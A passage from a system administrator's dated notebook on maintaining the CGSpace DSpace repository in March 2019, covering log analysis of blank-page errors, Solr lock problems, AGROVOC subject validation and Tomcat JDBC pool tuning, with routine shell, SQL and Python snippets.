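    with open(path, newline="") as f:
        for row in csv.DictReader(f):
            # metadata-export may qualify the column with a language, e.g. dc.date.issued[en_US]
            issued = next((v for k, v in row.items() if k.startswith("dc.date.issued")), "") or ""
            if issued.startswith(("2018", "2019")):
                print(f"{path}: id {row.get('id')} issued {issued}")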
    +
  • And looking at those items more closely, only one of them has an issue date of after 2018-04, so I will only update that one (as the country’s name only changed in 2018-04)
  • +
  • Run all system updates and reboot linode20
  • +
  • Follow up with Felix from Earlham to see if he’s done testing DSpace Test with COPO so I can re-sync the server from CGSpace
  • +
+

2019-03-15

+
    +
  • CGSpace (linode18) has the blank page error again
  • +
  • I’m not sure if it’s related, but I see the following error in DSpace’s log:
  • +
+
2019-03-15 14:09:32,685 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
+java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@55ba10b5 is closed.
+        at org.apache.tomcat.dbcp.dbcp.DelegatingConnection.checkOpen(DelegatingConnection.java:398)
+        at org.apache.tomcat.dbcp.dbcp.DelegatingConnection.prepareStatement(DelegatingConnection.java:279)
+        at org.apache.tomcat.dbcp.dbcp.PoolingDataSource$PoolGuardConnectionWrapper.prepareStatement(PoolingDataSource.java:313)
+        at org.dspace.storage.rdbms.DatabaseManager.queryTable(DatabaseManager.java:220)
+        at org.dspace.authorize.AuthorizeManager.getPolicies(AuthorizeManager.java:612)
+        at org.dspace.content.crosswalk.METSRightsCrosswalk.disseminateElement(METSRightsCrosswalk.java:154)
+        at org.dspace.content.crosswalk.METSRightsCrosswalk.disseminateElement(METSRightsCrosswalk.java:300)
+
    +
  • Interestingly, I see a pattern of these errors increasing, with single and double digit numbers over the past month, but spikes of over 1,000 today, yesterday, and on 2019-03-08, which was exactly the first time we saw this blank page error recently
  • +
+
$ grep -I 'SQL QueryTable Error' dspace.log.2019-0* | awk -F: '{print $1}' | sort | uniq -c | tail -n 25
+      5 dspace.log.2019-02-27
+     11 dspace.log.2019-02-28
+     29 dspace.log.2019-03-01
+     24 dspace.log.2019-03-02
+     41 dspace.log.2019-03-03
+     11 dspace.log.2019-03-04
+      9 dspace.log.2019-03-05
+     15 dspace.log.2019-03-06
+      7 dspace.log.2019-03-07
+      9 dspace.log.2019-03-08
+     22 dspace.log.2019-03-09
+     23 dspace.log.2019-03-10
+     18 dspace.log.2019-03-11
+     13 dspace.log.2019-03-12
+     10 dspace.log.2019-03-13
+     25 dspace.log.2019-03-14
+     12 dspace.log.2019-03-15
+     67 dspace.log.2019-03-16
+     72 dspace.log.2019-03-17
+      8 dspace.log.2019-03-18
+     15 dspace.log.2019-03-19
+     21 dspace.log.2019-03-20
+     29 dspace.log.2019-03-21
+     41 dspace.log.2019-03-22
+   4807 dspace.log.2019-03-23
+
    +
  • (Update on 2019-03-23 to use correct grep query)
  • +
  • There are not too many connections currently in PostgreSQL:
  • +
+
$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+      6 dspaceApi
+     10 dspaceCli
+     15 dspaceWeb
+
    +
  • I didn’t see anything interesting in the PostgreSQL logs, though this stack trace from the Tomcat logs (in the systemd journal) from earlier today might be related?
  • +
+
SEVERE: Servlet.service() for servlet [spring] in context with path [] threw exception [org.springframework.web.util.NestedServletException: Request processing failed; nested exception is java.util.EmptyStackException] with root cause
+java.util.EmptyStackException
+        at java.util.Stack.peek(Stack.java:102)
+        at java.util.Stack.pop(Stack.java:84)
+        at org.apache.cocoon.callstack.CallStack.leave(CallStack.java:54)
+        at org.apache.cocoon.servletservice.CallStackHelper.leaveServlet(CallStackHelper.java:85)
+        at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:484)
+        at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:443)
+        at org.apache.cocoon.servletservice.spring.ServletFactoryBean$ServiceInterceptor.invoke(ServletFactoryBean.java:264)
+        at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172)
+        at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:202)
+        at com.sun.proxy.$Proxy90.service(Unknown Source)
+        at org.dspace.springmvc.CocoonView.render(CocoonView.java:113)
+        at org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1180)
+        at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:950)
+        at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:852)
+        at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:882)
+        at org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:778)
+        at javax.servlet.http.HttpServlet.service(HttpServlet.java:624)
+        at javax.servlet.http.HttpServlet.service(HttpServlet.java:731)
+        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)
+        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+        at org.dspace.rdf.negotiation.NegotiationFilter.doFilter(NegotiationFilter.java:59)
+        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+        at org.dspace.utils.servlet.DSpaceWebappServletFilter.doFilter(DSpaceWebappServletFilter.java:78)
+        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+        at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:219)
+        at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110)
+        at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:494)
+        at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169)
+        at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:104)
+        at org.apache.catalina.valves.CrawlerSessionManagerValve.invoke(CrawlerSessionManagerValve.java:234)
+        at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:1025)
+        at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
+        at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:445)
+        at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1137)
+        at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:637)
+        at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:317)
+        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+        at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
+        at java.lang.Thread.run(Thread.java:748)
+
    +
  • For now I will just restart Tomcat…
  • +
+

2019-03-17

+
    +
  • Last week Felix from Earlham said that they finished testing on DSpace Test (linode19) so I made backups of some things there and re-deployed the system on Ubuntu 18.04 +
      +
    • During re-deployment I hit a few issues with the Ansible playbooks and made some minor improvements
    • +
    • There seems to be an issue with nodejs’s dependencies now, which causes npm to get uninstalled when installing the certbot dependencies (due to a conflict in libssl dependencies)
    • +
    • I re-worked the playbooks to use Node.js from the upstream official repository for now
    • +
    +
  • +
  • Create and merge pull request for the AGROVOC controlled list (#415) +
      +
    • Run all system updates on CGSpace (linode18) and re-deploy the 5_x-prod branch and reboot the server
    • +
    +
  • +
  • Re-sync DSpace Test with a fresh database snapshot and assetstore from CGSpace +
      +
    • After restarting Tomcat, Solr was giving the “Error opening new searcher” error for all cores
    • +
    • I stopped Tomcat, added ulimit -v unlimited to the catalina.sh script and deleted all old locks in the DSpace solr directory and then DSpace started up normally
    • +
    • I’m still not exactly sure why I see this error and if the ulimit trick actually helps, as the tomcat7.service has LimitAS=infinity anyways (and from checking the PID’s limits file in /proc it seems to be applied)
    • +
    • Then I noticed that the item displays were blank… so I checked the database info and saw there were some unfinished migrations
    • +
    • I’m not entirely sure if it’s related, but I tried to delete the old migrations and then force running the ignored ones, like when we upgraded to DSpace 5.8 in 2018-06, and after restarting Tomcat I could see the item displays again
    • +
    +
  • +
  • I copied the 2019 Solr statistics core from CGSpace to DSpace Test and it works (and is only 5.5GB currently), so now we have some useful stats on DSpace Test for the CUA module and the dspace-statistics-api
  • +
  • I ran DSpace’s cleanup task on CGSpace (linode18) and there were errors:
  • +
+
$ dspace cleanup -v
+Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
+  Detail: Key (bitstream_id)=(164496) is still referenced from table "bundle".
+
    +
  • The solution is, as always:
  • +
+
# su - postgres
+$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (164496);'
+UPDATE 1
+

2019-03-18

+
    +
  • I noticed that the regular expression for validating lines from input files in my agrovoc-lookup.py script was skipping characters with accents, etc, so I changed it to use the \w character class for words instead of trying to match [A-Z] etc… +
      +
    • We have Spanish and French subjects, so this is very important
    • +
    • Also there were some subjects with apostrophes, dashes, and periods… these are probably invalid AGROVOC subject terms, but we should nevertheless save them to the rejects file instead of skipping them
    • +
    +
  • +
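  • Roughly the difference, illustrated in Python 3 where \w matches Unicode word characters by default (the actual patterns in the script differ slightly):

# Quick illustration of why the \w change matters for accented subjects
import re

old = re.compile(r'^[A-Z ]+$')        # skips anything with accented characters
new = re.compile(r'^[\w\s]+$')        # \w matches Unicode letters in Python 3

print(bool(old.match('NUTRICIÓN')))   # False, the old pattern rejected valid terms
print(bool(new.match('NUTRICIÓN')))   # True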
  • Dump top 1500 subjects from CGSpace to try one more time to generate a list of invalid terms using my agrovoc-lookup.py script:
  • +
+
dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 57 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-03-18-top-1500-subject.csv WITH CSV HEADER;
+COPY 1500
+dspace=# \q
+$ csvcut -c text_value /tmp/2019-03-18-top-1500-subject.csv > 2019-03-18-top-1500-subject.csv
+$ ./agrovoc-lookup.py -l en -i 2019-03-18-top-1500-subject.csv -om /tmp/en-subjects-matched.txt -or /tmp/en-subjects-unmatched.txt
+$ ./agrovoc-lookup.py -l es -i 2019-03-18-top-1500-subject.csv -om /tmp/es-subjects-matched.txt -or /tmp/es-subjects-unmatched.txt
+$ ./agrovoc-lookup.py -l fr -i 2019-03-18-top-1500-subject.csv -om /tmp/fr-subjects-matched.txt -or /tmp/fr-subjects-unmatched.txt
+$ cat /tmp/*-subjects-matched.txt | sort -u > /tmp/subjects-matched-sorted.txt
+$ wc -l /tmp/subjects-matched-sorted.txt                                                              
+1318 /tmp/subjects-matched-sorted.txt
+$ sort -u 2019-03-18-top-1500-subject.csv > /tmp/1500-subjects-sorted.txt
+$ comm -13 /tmp/subjects-matched-sorted.txt /tmp/1500-subjects-sorted.txt > 2019-03-18-subjects-unmatched.txt
+$ wc -l 2019-03-18-subjects-unmatched.txt
+182 2019-03-18-subjects-unmatched.txt
+
    +
  • So the new total of matched terms with the updated regex is 1317 and unmatched is 183 (previous number of matched terms was 1187)
  • +
  • Create and merge a pull request to update the controlled vocabulary for AGROVOC terms (#416)
  • +
  • We are getting the blank page issue on CGSpace again today and I see a large number of the “SQL QueryTable Error” in the DSpace log again (last time was 2019-03-15):
  • +
+
$ grep -c 'SQL QueryTable Error' dspace.log.2019-03-1[5678]
+dspace.log.2019-03-15:929
+dspace.log.2019-03-16:67
+dspace.log.2019-03-17:72
+dspace.log.2019-03-18:1038
+
    +
  • Though WTF, this grep seems to be giving weird inaccurate results actually, and the real number of errors is much lower if I exclude the “binary file matches” result with -I:
  • +
+
$ grep -I 'SQL QueryTable Error' dspace.log.2019-03-18 | wc -l
+8
+$ grep -I 'SQL QueryTable Error' dspace.log.2019-03-{08,14,15,16,17,18} | awk -F: '{print $1}' | sort | uniq -c
+      9 dspace.log.2019-03-08
+     25 dspace.log.2019-03-14
+     12 dspace.log.2019-03-15
+     67 dspace.log.2019-03-16
+     72 dspace.log.2019-03-17
+      8 dspace.log.2019-03-18
+
    +
  • It seems to be something with grep doing binary matching on some log files for some reason, so I guess I need to always use -I to say binary files don’t match
  • +
  • Anyways, the full error in DSpace’s log is:
  • +
+
2019-03-18 12:26:23,331 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error - 
+java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@75eaa668 is closed.
+        at org.apache.tomcat.dbcp.dbcp.DelegatingConnection.checkOpen(DelegatingConnection.java:398)
+        at org.apache.tomcat.dbcp.dbcp.DelegatingConnection.prepareStatement(DelegatingConnection.java:279)
+        at org.apache.tomcat.dbcp.dbcp.PoolingDataSource$PoolGuardConnectionWrapper.prepareStatement(PoolingDataSource.java:313)
+        at org.dspace.storage.rdbms.DatabaseManager.queryTable(DatabaseManager.java:220)
+
    +
  • There is a low number of connections to PostgreSQL currently:
  • +
+
$ psql -c 'select * from pg_stat_activity' | wc -l
+33
+$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+      6 dspaceApi
+      7 dspaceCli
+     15 dspaceWeb
+
    +
  • I looked in the PostgreSQL logs, but all I see are a bunch of these errors going back two months to January:
  • +
+
2019-01-13 06:25:13.062 CET [9157] postgres@template1 ERROR:  column "waiting" does not exist at character 217
+
    +
  • This is unrelated and apparently due to Munin checking a column that was changed in PostgreSQL 9.6
  • +
  • I suspect that this issue with the blank pages might not be PostgreSQL after all, perhaps it’s a Cocoon thing?
  • +
  • Looking in the cocoon logs I see a large number of warnings about “Can not load requested doc” around 11AM and 12PM:
  • +
+
$ grep 'Can not load requested doc' cocoon.log.2019-03-18 | grep -oE '2019-03-18 [0-9]{2}:' | sort | uniq -c
+      2 2019-03-18 00:
+      6 2019-03-18 02:
+      3 2019-03-18 04:
+      1 2019-03-18 05:
+      1 2019-03-18 07:
+      2 2019-03-18 08:
+      4 2019-03-18 09:
+      5 2019-03-18 10:
+    863 2019-03-18 11:
+    203 2019-03-18 12:
+     14 2019-03-18 13:
+      1 2019-03-18 14:
+
    +
  • And a few days ago, on 2019-03-15, when it last happened, it was in the afternoon, and the same pattern occurs around 1–2PM:
  • +
+
$ xzgrep 'Can not load requested doc' cocoon.log.2019-03-15.xz | grep -oE '2019-03-15 [0-9]{2}:' | sort | uniq -c
+      4 2019-03-15 01:
+      3 2019-03-15 02:
+      1 2019-03-15 03:
+     13 2019-03-15 04:
+      1 2019-03-15 05:
+      2 2019-03-15 06:
+      3 2019-03-15 07:
+     27 2019-03-15 09:
+      9 2019-03-15 10:
+      3 2019-03-15 11:
+      2 2019-03-15 12:
+    531 2019-03-15 13:
+    274 2019-03-15 14:
+      4 2019-03-15 15:
+     75 2019-03-15 16:
+      5 2019-03-15 17:
+      5 2019-03-15 18:
+      6 2019-03-15 19:
+      2 2019-03-15 20:
+      4 2019-03-15 21:
+      3 2019-03-15 22:
+      1 2019-03-15 23:
+
    +
  • And again on 2019-03-08, surprise surprise, it happened in the morning:
  • +
+
$ xzgrep 'Can not load requested doc' cocoon.log.2019-03-08.xz | grep -oE '2019-03-08 [0-9]{2}:' | sort | uniq -c
+     11 2019-03-08 01:
+      3 2019-03-08 02:
+      1 2019-03-08 03:
+      2 2019-03-08 04:
+      1 2019-03-08 05:
+      1 2019-03-08 06:
+      1 2019-03-08 08:
+    425 2019-03-08 09:
+    432 2019-03-08 10:
+    717 2019-03-08 11:
+     59 2019-03-08 12:
+
    +
  • I’m not sure if it’s cocoon or that’s just a symptom of something else
  • +
+

2019-03-19

+
    +
  • I found a handful of AGROVOC subjects that use a non-breaking space (0x00a0) instead of a regular space, which makes for some pretty confusing debugging…
  • +
  • I will replace these in the database immediately to save myself the headache later:
  • +
+
dspace=# SELECT count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = 57 AND text_value ~ '.+\u00a0.+';
+ count 
+-------
+    84
+(1 row)
+
    +
  • Perhaps my agrovoc-lookup.py script could notify if it finds these because they potentially give false negatives
  • +
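  • Something like this in the script would do it (a sketch, assuming Python 3):

# Sketch: warn when a subject term contains a non-breaking space (U+00A0), which looks
# identical to a normal space but makes the AGROVOC lookup fail
import sys

NBSP = "\u00a0"

def check_term(term):
    if NBSP in term:
        print(f"WARNING: non-breaking space in term: {term!r}", file=sys.stderr)
    return term.replace(NBSP, " ")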
  • CGSpace (linode18) is having problems with Solr again, I’m seeing “Error opening new searcher” in the Solr logs and there are no stats for previous years
  • +
  • Apparently the Solr statistics shards didn’t load properly when we restarted Tomcat yesterday:
  • +
+
2019-03-18 12:32:39,799 ERROR org.apache.solr.core.CoreContainer @ Error creating core [statistics-2018]: Error opening new searcher
+...
+Caused by: org.apache.solr.common.SolrException: Error opening new searcher
+        at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1565)
+        at org.apache.solr.core.SolrCore.getSearcher(SolrCore.java:1677)
+        at org.apache.solr.core.SolrCore.<init>(SolrCore.java:845)
+        ... 31 more
+Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
+
    +
  • For reference, I don’t see the ulimit -v unlimited in the catalina.sh script, though the tomcat7 systemd service has LimitAS=infinity
  • +
  • The limits of the current Tomcat java process are:
  • +
+
# cat /proc/27182/limits 
+Limit                     Soft Limit           Hard Limit           Units     
+Max cpu time              unlimited            unlimited            seconds   
+Max file size             unlimited            unlimited            bytes     
+Max data size             unlimited            unlimited            bytes     
+Max stack size            8388608              unlimited            bytes     
+Max core file size        0                    unlimited            bytes     
+Max resident set          unlimited            unlimited            bytes     
+Max processes             128589               128589               processes 
+Max open files            16384                16384                files     
+Max locked memory         65536                65536                bytes     
+Max address space         unlimited            unlimited            bytes     
+Max file locks            unlimited            unlimited            locks     
+Max pending signals       128589               128589               signals   
+Max msgqueue size         819200               819200               bytes     
+Max nice priority         0                    0                    
+Max realtime priority     0                    0                    
+Max realtime timeout      unlimited            unlimited            us
+
    +
  • I will try to add ulimit -v unlimited to the Catalina startup script and check the output of the limits to see if it’s different in practice, as some wisdom on Stack Overflow says this solves the Solr core issues and I’ve superstitiously tried it various times in the past +
      +
    • The result is the same before and after, so adding the ulimit directly is unnecessary (whether unlimited address space is actually useful is another question)
    • +
    +
  • +
  • For now I will just stop Tomcat, delete Solr locks, then start Tomcat again:
  • +
+
# systemctl stop tomcat7
+# find /home/cgspace.cgiar.org/solr/ -iname "*.lock" -delete
+# systemctl start tomcat7
+
    +
  • After restarting I confirmed that all Solr statistics cores were loaded successfully…
  • +
  • Another avenue might be to look at point releases in Solr 4.10.x, as we’re running 4.10.2 and they released 4.10.3 and 4.10.4 back in 2014 or 2015 +
      +
    • I see several issues regarding locks and IndexWriter that were fixed in Solr and Lucene 4.10.3 and 4.10.4…
    • +
    +
  • +
  • I sent a mail to the dspace-tech mailing list to ask about Solr issues
  • +
  • Testing Solr 4.10.4 on DSpace 5.8: +
      +
    • Discovery indexing
    • +
    • dspace-statistics-api indexer
    • +
    • /solr admin UI
    • +
    +
  • +
+

2019-03-20

+
    +
  • Create a branch for Solr 4.10.4 changes so I can test on DSpace Test (linode19) +
      +
    • Deployed Solr 4.10.4 on DSpace Test and will leave it there for a few weeks, as well as on my local environment
    • +
    +
  • +
+

2019-03-21

+
    +
  • It’s been two days since we had the blank page issue on CGSpace, and looking in the Cocoon logs I see very low numbers of the errors that we were seeing the last time the issue occurred:
  • +
+
$ grep 'Can not load requested doc' cocoon.log.2019-03-20 | grep -oE '2019-03-20 [0-9]{2}:' | sort | uniq -c
+      3 2019-03-20 00:
+     12 2019-03-20 02:
+$ grep 'Can not load requested doc' cocoon.log.2019-03-21 | grep -oE '2019-03-21 [0-9]{2}:' | sort | uniq -c
+      4 2019-03-21 00:
+      1 2019-03-21 02:
+      4 2019-03-21 03:
+      1 2019-03-21 05:
+      4 2019-03-21 06:
+     11 2019-03-21 07:
+     14 2019-03-21 08:
+      3 2019-03-21 09:
+      4 2019-03-21 10:
+      5 2019-03-21 11:
+      4 2019-03-21 12:
+      3 2019-03-21 13:
+      6 2019-03-21 14:
+      2 2019-03-21 15:
+      3 2019-03-21 16:
+      3 2019-03-21 18:
+      1 2019-03-21 19:
+      6 2019-03-21 20:
+
    +
  • To investigate the Solr lock issue I added a find command to the Tomcat 7 service with ExecStartPre and ExecStopPost and noticed that the lock files are always there… +
      +
    • Perhaps the lock files are less of an issue than I thought?
    • +
    • I will share my thoughts with the dspace-tech community
    • +
    +
  • +
  • In other news, I notice that systemd always thinks that Tomcat has failed when it stops because the JVM exits with code 143, which is apparently normal when processes gracefully receive a SIGTERM (128 + 15 == 143) +
      +
    • We can add SuccessExitStatus=143 to the systemd service so that it knows this is a successful exit
    • +
    +
  • +
+

2019-03-22

+
    +
  • Share the initial list of invalid AGROVOC terms on Yammer to ask the editors for help in correcting them
  • +
  • Advise Phanuel Ayuka from IITA about using controlled vocabularies in DSpace
  • +
+

2019-03-23

+
    +
  • CGSpace (linode18) is having the blank page issue again and it seems to have started last night around 21:00:
  • +
+
$ grep 'Can not load requested doc' cocoon.log.2019-03-22 | grep -oE '2019-03-22 [0-9]{2}:' | sort | uniq -c
+      2 2019-03-22 00:
+     69 2019-03-22 01:
+      1 2019-03-22 02:
+     13 2019-03-22 03:
+      2 2019-03-22 05:
+      2 2019-03-22 06:
+      8 2019-03-22 07:
+      4 2019-03-22 08:
+     12 2019-03-22 09:
+      7 2019-03-22 10:
+      1 2019-03-22 11:
+      2 2019-03-22 12:
+     14 2019-03-22 13:
+      4 2019-03-22 15:
+      7 2019-03-22 16:
+      7 2019-03-22 17:
+      3 2019-03-22 18:
+      3 2019-03-22 19:
+      7 2019-03-22 20:
+    323 2019-03-22 21:
+    685 2019-03-22 22:
+    357 2019-03-22 23:
+$ grep 'Can not load requested doc' cocoon.log.2019-03-23 | grep -oE '2019-03-23 [0-9]{2}:' | sort | uniq -c
+    575 2019-03-23 00:
+    445 2019-03-23 01:
+    518 2019-03-23 02:
+    436 2019-03-23 03:
+    387 2019-03-23 04:
+    593 2019-03-23 05:
+    468 2019-03-23 06:
+    541 2019-03-23 07:
+    440 2019-03-23 08:
+    260 2019-03-23 09:
+
    +
  • I was curious to see if clearing the Cocoon cache in the XMLUI control panel would fix it, but it didn’t
  • +
  • Trying to drill down more, I see that the bulk of the errors started around 21:20:
  • +
+
$ grep 'Can not load requested doc' cocoon.log.2019-03-22 | grep -oE '2019-03-22 21:[0-9]' | sort | uniq -c
+      1 2019-03-22 21:0
+      1 2019-03-22 21:1
+     59 2019-03-22 21:2
+     69 2019-03-22 21:3
+     89 2019-03-22 21:4
+    104 2019-03-22 21:5
+
    +
  • Looking at the Cocoon log around that time I see the full error is:
  • +
+
2019-03-22 21:21:34,378 WARN  org.apache.cocoon.components.xslt.TraxErrorListener  - Can not load requested doc: unknown protocol: cocoon at jndi:/localhost/themes/CIAT/xsl/../../0_CGIAR/xsl//aspect/artifactbrowser/common.xsl:141:90
+
    +
  • A few milliseconds before that time I see this in the DSpace log:
  • +
+
2019-03-22 21:21:34,356 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
+org.postgresql.util.PSQLException: This statement has been closed.
+        at org.postgresql.jdbc.PgStatement.checkClosed(PgStatement.java:694)
+        at org.postgresql.jdbc.PgStatement.getMaxRows(PgStatement.java:501)
+        at org.postgresql.jdbc.PgStatement.createResultSet(PgStatement.java:153)
+        at org.postgresql.jdbc.PgStatement$StatementResultHandler.handleResultRows(PgStatement.java:204)
+        at org.postgresql.core.ResultHandlerDelegate.handleResultRows(ResultHandlerDelegate.java:29)
+        at org.postgresql.core.v3.QueryExecutorImpl$1.handleResultRows(QueryExecutorImpl.java:528)
+        at org.postgresql.core.v3.QueryExecutorImpl.processResults(QueryExecutorImpl.java:2120)
+        at org.postgresql.core.v3.QueryExecutorImpl.execute(QueryExecutorImpl.java:308)
+        at org.postgresql.jdbc.PgStatement.executeInternal(PgStatement.java:441)
+        at org.postgresql.jdbc.PgStatement.execute(PgStatement.java:365)
+        at org.postgresql.jdbc.PgPreparedStatement.executeWithFlags(PgPreparedStatement.java:143)
+        at org.postgresql.jdbc.PgPreparedStatement.executeQuery(PgPreparedStatement.java:106)
+        at org.apache.tomcat.dbcp.dbcp.DelegatingPreparedStatement.executeQuery(DelegatingPreparedStatement.java:96)
+        at org.apache.tomcat.dbcp.dbcp.DelegatingPreparedStatement.executeQuery(DelegatingPreparedStatement.java:96)
+        at org.dspace.storage.rdbms.DatabaseManager.queryTable(DatabaseManager.java:224)
+        at org.dspace.storage.rdbms.DatabaseManager.querySingleTable(DatabaseManager.java:375)
+        at org.dspace.storage.rdbms.DatabaseManager.findByUnique(DatabaseManager.java:544)
+        at org.dspace.storage.rdbms.DatabaseManager.find(DatabaseManager.java:501)
+        at org.dspace.eperson.Group.find(Group.java:706)
+...
+2019-03-22 21:21:34,381 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL query singleTable Error -
+org.postgresql.util.PSQLException: This statement has been closed.
+        at org.postgresql.jdbc.PgStatement.checkClosed(PgStatement.java:694)
+        at org.postgresql.jdbc.PgStatement.getMaxRows(PgStatement.java:501)
+        at org.postgresql.jdbc.PgStatement.createResultSet(PgStatement.java:153)
+...
+2019-03-22 21:21:34,386 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL findByUnique Error -
+org.postgresql.util.PSQLException: This statement has been closed.
+        at org.postgresql.jdbc.PgStatement.checkClosed(PgStatement.java:694)
+        at org.postgresql.jdbc.PgStatement.getMaxRows(PgStatement.java:501)
+        at org.postgresql.jdbc.PgStatement.createResultSet(PgStatement.java:153)
+...
+2019-03-22 21:21:34,395 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL find Error -
+org.postgresql.util.PSQLException: This statement has been closed.
+        at org.postgresql.jdbc.PgStatement.checkClosed(PgStatement.java:694)
+        at org.postgresql.jdbc.PgStatement.getMaxRows(PgStatement.java:501)
+        at org.postgresql.jdbc.PgStatement.createResultSet(PgStatement.java:153)
+        at org.postgresql.jdbc.PgStatement$StatementResultHandler.handleResultRows(PgStatement.java:204)
+
    +
  • I restarted Tomcat and now the item displays are working again for now
  • I am wondering if this is an issue with removing abandoned connections in Tomcat’s JDBC pooling?
    • It’s hard to tell because we have logAbandoned enabled, but I don’t see anything in the tomcat7 service logs in the systemd journal
  • I sent another mail to the dspace-tech mailing list with my observations
  • I spent some time trying to test and debug the Tomcat connection pool’s settings, but for some reason our logs are either messed up or no connections are actually getting abandoned
  • I compiled this TomcatJdbcConnectionTest and created a bunch of database connections and waited a few minutes, but they never got abandoned until I created more than maxActive (75), after which almost all were purged at once
    • So perhaps our settings are not working right, but at least I know the logging works now…
+

2019-03-24

+
    +
  • I did some more tests with the TomcatJdbcConnectionTest thing, and after adjusting the limits quite low and watching the number of active connections in jconsole I eventually saw some connections get abandoned
  • +
  • I forgot that to connect to a remote JMX session with jconsole you need to use a dynamic SSH SOCKS proxy (as I originally discovered in 2017-11):
  • +
+
$ jconsole -J-DsocksProxyHost=localhost -J-DsocksProxyPort=3000 service:jmx:rmi:///jndi/rmi://localhost:5400/jmxrmi -J-DsocksNonProxyHosts=
+
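The SOCKS proxy itself is just a dynamic SSH forward on the same port, something like this (user and host are placeholders):

$ ssh -D 3000 -N user@remote-host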
    +
  • I need to remember to check the active connections next time we have issues with blank item pages on CGSpace
  • +
  • In other news, I’ve been running G1GC on DSpace Test (linode19) since 2018-11-08 without realizing it, which is probably a good thing
  • +
  • I deployed the latest 5_x-prod branch on CGSpace (linode18) and added more validation to the JDBC pool in our Tomcat config +
      +
    • This includes the new testWhileIdle and testOnConnect pool settings as well as the two new JDBC interceptors: StatementFinalizer and ConnectionState that should hopefully make sure our connections in the pool are valid
    • +
    +
  • +
  • I spent one hour looking at the invalid AGROVOC terms from last week +
      +
    • It doesn’t seem like any of the editors did any work on this so I did most of them
    • +
    +
  • +
+

2019-03-25

+
    +
  • Finish looking over the 175 invalid AGROVOC terms +
      +
    • I need to apply the corrections and deletions this week
    • +
    +
  • +
  • Looking at the DBCP status on CGSpace via jconsole and everything looks good, though I wonder why timeBetweenEvictionRunsMillis is -1, because the Tomcat 7.0 JDBC docs say the default is 5000… +
      +
    • Could be an error in the docs, as I see the Apache Commons DBCP has -1 as the default
    • +
    • Maybe I need to re-evaluate the “defaults” of Tomcat 7’s DBCP and set them explicitly in our config
    • +
    • From Tomcat 8 they seem to default to Apache Commons’ DBCP 2.x
    • +
    +
  • +
  • Also, CGSpace doesn’t have many Cocoon errors yet this morning:
  • +
+
$ grep 'Can not load requested doc' cocoon.log.2019-03-25 | grep -oE '2019-03-25 [0-9]{2}:' | sort | uniq -c
+      4 2019-03-25 00:
+      1 2019-03-25 01:
+
    +
  • Holy shit I just realized we’ve been using the wrong DBCP pool in Tomcat +
      +
    • By default you get the Commons DBCP one unless you specify factory org.apache.tomcat.jdbc.pool.DataSourceFactory (a sketch of what that looks like is below)
    • +
    • Now I see all my interceptor settings etc in jconsole, where I didn’t see them before (also a new tomcat.jdbc mbean)!
    • +
    • No wonder our settings didn’t quite match the ones in the Tomcat DBCP Pool docs
    • +
    +
  • +
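For reference, this is roughly what the JNDI Resource needs to look like in order to get Tomcat’s own pool instead of Commons DBCP; the resource name, credentials, and limits here are illustrative assumptions, not our exact config:

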